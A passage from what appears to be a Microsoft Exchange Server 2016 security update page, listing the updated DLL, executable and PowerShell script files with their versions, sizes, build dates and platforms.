\nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.1.2375.17| 28,048| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.transport.common.dll| 15.1.2375.17| 457,104| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.1.2375.17| 18,296| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.1.2375.17| 30,608| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.transport.dll| 15.1.2375.17| 4,181,392| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.1.2375.17| 182,136| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.1.2375.17| 121,720| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.1.2375.17| 406,416| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.1.2375.14| 14,712| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.1.2375.17| 86,920| 3-Nov-21| 18:44| x86 \nMicrosoft.exchange.transport.logging.dll| 15.1.2375.17| 88,952| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.1.2375.17| 68,496| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.1.2375.17| 63,376| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.1.2375.17| 428,936| 3-Nov-21| 21:28| x86 \nMicrosoft.exchange.transport.net.dll| 15.1.2375.17| 121,232| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.1.2375.17| 17,784| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.1.2375.17| 29,072| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.1.2375.17| 60,304| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.1.2375.17| 49,528| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.1.2375.17| 33,144| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.1.2375.17| 112,520| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.1.2375.17| 18,320| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.1.2375.17| 52,088| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.transport.storage.dll| 15.1.2375.17| 672,128| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.1.2375.17| 21,904| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.1.2375.17| 17,784| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.1.2375.17| 487,312| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.1.2375.17| 12,664| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.1.2375.17| 306,040| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.1.2375.17| 15,760| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.1.2375.17| 46,472| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.1.2375.17| 1,044,368| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.1.2375.17| 18,832| 3-Nov-21| 18:27| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.1.2375.17| 18,808| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.2375.17| 22,392| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2375.17| 60,280| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.2375.17| 211,840| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.2375.17| 120,712| 3-Nov-21| 18:10| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.2375.17| 214,920| 3-Nov-21| 18:13| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2375.17| 118,664| 3-Nov-21| 18:25| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2375.17| 239,496| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.2375.17| 926,096| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.2375.17| 1,472,392| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2375.17| 32,648| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2375.17| 41,864| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2375.17| 24,952| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2375.17| 130,424| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2375.17| 83,320| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2375.17| 50,040| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2375.17| 658,816| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2375.14| 186,256| 3-Nov-21| 18:09| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2375.17| 67,464| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2375.17| 12,664| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2375.17| 56,696| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2375.17| 28,040| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2375.17| 120,704| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2375.17| 31,616| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2375.17| 57,208| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2375.17| 35,720| 3-Nov-21| 18:12| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2375.17| 1,054,072| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2375.17| 67,976| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2375.17| 23,416| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2375.17| 76,176| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2375.17| 17,288| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2375.17| 29,072| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2375.17| 505,232| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2375.17| 14,712| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2375.17| 36,728| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2375.17| 66,432| 3-Nov-21| 19:47| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2375.17| 19,344| 3-Nov-21| 18:10| x86 \nMicrosoft.filtering.dll| 15.1.2375.17| 113,016| 3-Nov-21| 18:43| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2375.17| 57,224| 3-Nov-21| 20:01| x86 \nMicrosoft.filtering.interop.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:43| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2375.17| 46,992| 3-Nov-21| 19:15| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2375.17| 15,736| 3-Nov-21| 18:19| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2375.17| 23,928| 3-Nov-21| 18:25| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2375.17| 22,392| 3-Nov-21| 18:11| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2375.17| 34,192| 3-Nov-21| 18:19| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,914| 3-Nov-21| 20:46| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,290| 3-Nov-21| 20:46| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2375.17| 1,518,984| 3-Nov-21| 21:30| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:19| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2375.17| 33,168| 3-Nov-21| 21:06| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2375.17| 18,320| 3-Nov-21| 18:10| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2375.17| 45,968| 3-Nov-21| 20:01| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2375.17| 50,552| 3-Nov-21| 20:02| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2375.17| 72,592| 3-Nov-21| 18:26| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2375.17| 534,416| 3-Nov-21| 18:22| x86 \nMicrosoft.managementgui.dll| 15.1.2375.17| 133,496| 3-Nov-21| 18:21| x86 \nMicrosoft.mce.interop.dll| 15.1.2375.17| 24,456| 3-Nov-21| 18:11| x86 \nMicrosoft.office.audit.dll| 15.1.2375.17| 123,768| 3-Nov-21| 18:12| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2375.17| 585,608| 3-Nov-21| 18:43| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2375.17| 42,376| 3-Nov-21| 18:36| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2375.17| 217,976| 3-Nov-21| 22:22| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2375.17| 854,904| 3-Nov-21| 22:35| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2375.17| 485,768| 3-Nov-21| 22:31| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2375.17| 412,024| 3-Nov-21| 18:39| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2375.17| 36,216| 3-Nov-21| 18:36| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2375.17| 85,368| 3-Nov-21| 20:01| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2375.17| 1,782,672| 3-Nov-21| 18:22| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2375.17| 49,528| 3-Nov-21| 20:01| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2375.17| 27,528| 3-Nov-21| 20:06| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2375.17| 174,968| 3-Nov-21| 18:39| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2375.17| 166,264| 3-Nov-21| 19:25| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2375.17| 40,320| 3-Nov-21| 18:10| x86 \nMicrosoft.online.box.shell.dll| 15.1.2375.17| 46,456| 3-Nov-21| 18:11| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2375.17| 67,960| 3-Nov-21| 18:12| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2375.17| 67,960| 3-Nov-21| 18:12| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2375.17| 120,208| 3-Nov-21| 18:36| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,122| 3-Nov-21| 18:09| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,064| 3-Nov-21| 18:09| Not applicable \nMovemailbox.ps1| Not applicable| 61,140| 3-Nov-21| 18:09| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,602| 3-Nov-21| 18:09| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,532| 3-Nov-21| 18:09| Not applicable \nMpgearparser.dll| 15.1.2375.17| 99,728| 3-Nov-21| 18:25| x64 \nMsclassificationadapter.dll| 15.1.2375.17| 248,696| 3-Nov-21| 18:27| x64 \nMsexchangecompliance.exe| 15.1.2375.17| 78,712| 3-Nov-21| 20:29| x86 \nMsexchangedagmgmt.exe| 15.1.2375.17| 25,464| 3-Nov-21| 20:07| x86 \nMsexchangedelivery.exe| 15.1.2375.17| 38,800| 3-Nov-21| 20:06| x86 \nMsexchangefrontendtransport.exe| 15.1.2375.17| 31,624| 3-Nov-21| 20:01| x86 \nMsexchangehmhost.exe| 15.1.2375.17| 27,000| 3-Nov-21| 21:37| x86 \nMsexchangehmrecovery.exe| 15.1.2375.17| 29,560| 3-Nov-21| 19:25| x86 \nMsexchangemailboxassistants.exe| 15.1.2375.17| 72,568| 3-Nov-21| 20:06| x86 \nMsexchangemailboxreplication.exe| 15.1.2375.17| 20,856| 3-Nov-21| 20:18| x86 \nMsexchangemigrationworkflow.exe| 15.1.2375.17| 69,496| 3-Nov-21| 20:23| x86 \nMsexchangerepl.exe| 15.1.2375.17| 72,056| 3-Nov-21| 20:12| x86 \nMsexchangesubmission.exe| 15.1.2375.17| 123,256| 3-Nov-21| 20:16| x86 \nMsexchangethrottling.exe| 15.1.2375.17| 39,824| 3-Nov-21| 19:15| x86 \nMsexchangetransport.exe| 15.1.2375.17| 74,128| 3-Nov-21| 19:15| x86 \nMsexchangetransportlogsearch.exe| 15.1.2375.17| 139,128| 3-Nov-21| 20:02| x86 \nMsexchangewatchdog.exe| 15.1.2375.17| 55,696| 3-Nov-21| 18:19| x64 \nMspatchlinterop.dll| 15.1.2375.17| 53,648| 3-Nov-21| 18:23| x64 \nNativehttpproxy.dll| 15.1.2375.14| 91,528| 3-Nov-21| 18:09| x64 \nNavigatorparser.dll| 15.1.2375.17| 636,816| 3-Nov-21| 18:19| x64 \nNego2nativeinterface.dll| 15.1.2375.17| 19,320| 3-Nov-21| 18:19| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2375.17| 30,088| 3-Nov-21| 18:19| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,264| 3-Nov-21| 18:09| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,575| 3-Nov-21| 18:09| Not applicable \nNtspxgen.dll| 15.1.2375.17| 80,776| 3-Nov-21| 18:29| x64 \nOleconverter.exe| 15.1.2375.17| 173,968| 3-Nov-21| 18:19| x64 \nOutsideinmodule.dll| 15.1.2375.17| 87,952| 3-Nov-21| 18:28| x64 \nOwaauth.dll| 15.1.2375.17| 92,024| 3-Nov-21| 18:19| x64 \nOwasmime.msi| Not applicable| 720,896| 3-Nov-21| 18:36| Not applicable \nPerf_common_extrace.dll| 15.1.2375.17| 245,128| 3-Nov-21| 18:10| x64 \nPerf_exchmem.dll| 15.1.2375.17| 85,904| 3-Nov-21| 18:19| x64 \nPipeline2.dll| 15.1.2375.17| 1,454,472| 3-Nov-21| 18:36| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2375.17| 41,360| 3-Nov-21| 20:44| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,995| 3-Nov-21| 18:09| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,229| 3-Nov-21| 18:09| Not applicable \nProductinfo.managed.dll| 15.1.2375.17| 27,000| 3-Nov-21| 18:11| x86 \nProxybinclientsstringsdll| 15.1.2375.17| 924,536| 3-Nov-21| 18:21| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,234| 3-Nov-21| 18:09| Not applicable \nQuietexe.exe| 15.1.2375.17| 14,728| 3-Nov-21| 18:29| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,532| 3-Nov-21| 18:21| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,675| 3-Nov-21| 20:40| Not applicable \nRemoteexchange.ps1| Not applicable| 23,573| 3-Nov-21| 20:45| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,684| 3-Nov-21| 18:09| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,002| 3-Nov-21| 18:09| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,008| 3-Nov-21| 18:09| Not applicable \nReplaycrimsonmsg.dll| 15.1.2375.17| 1,099,128| 3-Nov-21| 18:12| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,496| 3-Nov-21| 20:40| Not applicable \nResetcasservice.ps1| Not applicable| 21,707| 3-Nov-21| 18:09| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,121| 3-Nov-21| 18:12| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,141| 3-Nov-21| 18:09| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,210| 3-Nov-21| 18:21| Not applicable \nRightsmanagementwrapper.dll| 15.1.2375.17| 86,416| 3-Nov-21| 18:22| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,770| 3-Nov-21| 18:09| Not applicable \nRpcperf.dll| 15.1.2375.17| 23,432| 3-Nov-21| 18:19| x64 \nRpcproxyshim.dll| 15.1.2375.17| 39,312| 3-Nov-21| 18:22| x64 \nRulesauditmsg.dll| 15.1.2375.17| 12,664| 3-Nov-21| 18:13| x64 \nRwsperfcounters.xml| Not applicable| 23,024| 3-Nov-21| 20:47| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2375.14| 34,688| 3-Nov-21| 18:09| x64 \nScanenginetest.exe| 15.1.2375.17| 956,304| 3-Nov-21| 18:23| x64 \nScanningprocess.exe| 15.1.2375.17| 739,192| 3-Nov-21| 18:37| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,812| 3-Nov-21| 18:09| Not applicable \nServicecontrol.ps1| Not applicable| 52,309| 3-Nov-21| 18:09| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 3-Nov-21| 18:09| Not applicable \nSettingsadapter.dll| 15.1.2375.17| 116,104| 3-Nov-21| 18:27| x64 \nSetup.exe| 15.1.2375.17| 21,392| 3-Nov-21| 18:36| x86 \nSetupui.exe| 15.1.2375.17| 49,016| 3-Nov-21| 20:43| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,189| 3-Nov-21| 18:09| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,831| 3-Nov-21| 18:21| Not applicable \nStatisticsutil.dll| 15.1.2375.17| 142,224| 3-Nov-21| 18:22| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,117| 3-Nov-21| 18:21| Not applicable \nStoretsconstants.ps1| Not applicable| 15,850| 3-Nov-21| 18:39| Not applicable \nStoretslibrary.ps1| Not applicable| 28,023| 3-Nov-21| 18:39| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2375.17| 28,536| 3-Nov-21| 18:12| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,923| 3-Nov-21| 18:09| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,973| 3-Nov-21| 18:09| Not applicable \nTest_mitigationserviceconnectivity.ps1| Not applicable| 14,186| 3-Nov-21| 18:09| Not applicable \nTextconversionmodule.dll| 15.1.2375.17| 86,416| 3-Nov-21| 18:19| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,747| 3-Nov-21| 18:39| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,453| 3-Nov-21| 18:39| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,049| 3-Nov-21| 18:39| Not applicable \nUmservice.exe| 15.1.2375.17| 100,240| 3-Nov-21| 20:11| x86 \nUmworkerprocess.exe| 15.1.2375.17| 38,280| 3-Nov-21| 20:09| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,493| 3-Nov-21| 18:12| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,030| 3-Nov-21| 18:09| Not applicable \nUpdatecas.ps1| Not applicable| 35,327| 3-Nov-21| 18:09| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,722| 3-Nov-21| 18:09| Not applicable \nUpdateserver.exe| 15.1.2375.17| 3,014,544| 3-Nov-21| 18:27| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,156| 3-Nov-21| 18:09| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,048| 3-Nov-21| 22:22| Not applicable \nWsbexchange.exe| 15.1.2375.17| 125,328| 3-Nov-21| 18:24| x64 \nX400prox.dll| 15.1.2375.17| 103,304| 3-Nov-21| 18:19| x64 \n_search.lingoperators.a| 15.1.2375.17| 34,704| 3-Nov-21| 19:47| Not applicable \n_search.lingoperators.b| 15.1.2375.17| 34,704| 3-Nov-21| 19:47| Not applicable \n_search.mailboxoperators.a| 15.1.2375.17| 288,656| 3-Nov-21| 20:14| Not applicable \n_search.mailboxoperators.b| 15.1.2375.17| 288,656| 3-Nov-21| 20:14| Not applicable \n_search.operatorschema.a| 15.1.2375.17| 483,192| 3-Nov-21| 19:29| Not applicable \n_search.operatorschema.b| 15.1.2375.17| 483,192| 3-Nov-21| 19:29| Not applicable \n_search.tokenoperators.a| 15.1.2375.17| 106,888| 3-Nov-21| 19:47| Not applicable \n_search.tokenoperators.b| 15.1.2375.17| 106,888| 3-Nov-21| 19:47| Not applicable \n_search.transportoperators.a| 15.1.2375.17| 64,912| 3-Nov-21| 20:19| Not applicable \n_search.transportoperators.b| 15.1.2375.17| 64,912| 3-Nov-21| 20:19| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 21 Security Update 3\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2308.20| 71,032| 3-Nov-21| 18:29| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,518| 3-Nov-21| 18:30| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,941| 3-Nov-21| 18:41| Not applicable \nAdemodule.dll| 15.1.2308.20| 106,376| 3-Nov-21| 18:30| x64 \nAirfilter.dll| 15.1.2308.20| 42,896| 3-Nov-21| 18:22| x64 \nAjaxcontroltoolkit.dll| 15.1.2308.20| 92,560| 3-Nov-21| 18:36| x86 \nAntispamcommon.ps1| Not applicable| 13,521| 3-Nov-21| 18:20| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 3-Nov-21| 18:37| Not applicable \nAsentirs.msi| Not applicable| 77,824| 3-Nov-21| 18:41| Not applicable \nAsentsig.msi| Not applicable| 73,728| 3-Nov-21| 18:37| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2308.20| 43,912| 3-Nov-21| 18:28| x86 \nBigfunnel.common.dll| 15.1.2308.20| 63,864| 3-Nov-21| 18:20| x86 \nBigfunnel.configuration.dll| 15.1.2308.20| 99,208| 3-Nov-21| 18:52| x86 \nBigfunnel.entropy.dll| 15.1.2308.20| 44,408| 3-Nov-21| 18:28| x86 \nBigfunnel.filter.dll| 15.1.2308.20| 54,160| 3-Nov-21| 18:29| x86 \nBigfunnel.indexstream.dll| 15.1.2308.20| 54,160| 3-Nov-21| 18:37| x86 \nBigfunnel.poi.dll| 15.1.2308.20| 203,664| 3-Nov-21| 18:22| x86 \nBigfunnel.postinglist.dll| 15.1.2308.20| 122,256| 3-Nov-21| 18:37| x86 \nBigfunnel.query.dll| 15.1.2308.20| 99,704| 3-Nov-21| 18:22| x86 \nBigfunnel.ranking.dll| 15.1.2308.20| 79,248| 3-Nov-21| 18:39| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2308.20| 3,634,568| 3-Nov-21| 18:37| x86 \nBigfunnel.wordbreakers.dll| 15.1.2308.20| 46,480| 3-Nov-21| 18:30| x86 \nCafe_airfilter_dll| 15.1.2308.20| 42,896| 3-Nov-21| 18:22| x64 \nCafe_exppw_dll| 15.1.2308.20| 83,320| 3-Nov-21| 18:22| x64 \nCafe_owaauth_dll| 15.1.2308.20| 92,024| 3-Nov-21| 18:37| x64 \nCalcalculation.ps1| Not applicable| 42,129| 3-Nov-21| 18:44| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,598| 3-Nov-21| 18:37| Not applicable \nChksgfiles.dll| 15.1.2308.20| 57,224| 3-Nov-21| 18:37| x64 \nCitsconstants.ps1| Not applicable| 15,801| 3-Nov-21| 18:52| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 3-Nov-21| 18:52| Not applicable \nCitstypes.ps1| Not applicable| 14,476| 3-Nov-21| 18:52| Not applicable \nClassificationengine_mce| 15.1.2308.20| 1,693,064| 3-Nov-21| 18:36| Not applicable \nClusmsg.dll| 15.1.2308.20| 134,008| 3-Nov-21| 18:22| x64 \nCoconet.dll| 15.1.2308.20| 47,992| 3-Nov-21| 18:37| x64 \nCollectovermetrics.ps1| Not applicable| 81,636| 3-Nov-21| 18:37| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,902| 3-Nov-21| 18:37| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,963| 3-Nov-21| 21:05| Not applicable \nComplianceauditservice.exe| 15.1.2308.20| 39,816| 3-Nov-21| 21:08| x86 \nConfigureadam.ps1| Not applicable| 22,796| 3-Nov-21| 18:41| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,320| 3-Nov-21| 18:41| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,762| 3-Nov-21| 18:41| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,824| 3-Nov-21| 18:41| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,279| 3-Nov-21| 18:41| Not applicable \nConnectfunctions.ps1| Not applicable| 37,157| 3-Nov-21| 21:05| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,432| 3-Nov-21| 21:05| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,264| 3-Nov-21| 20:50| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,045| 3-Nov-21| 18:41| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,564| 3-Nov-21| 18:41| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,761| 3-Nov-21| 18:41| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,904| 3-Nov-21| 18:41| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts_exsmime.dll| 15.1.2308.20| 380,816| 3-Nov-21| 18:29| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2308.20| 1,686,904| 3-Nov-21| 18:28| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 517| 3-Nov-21| 18:13| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:20| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:36| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 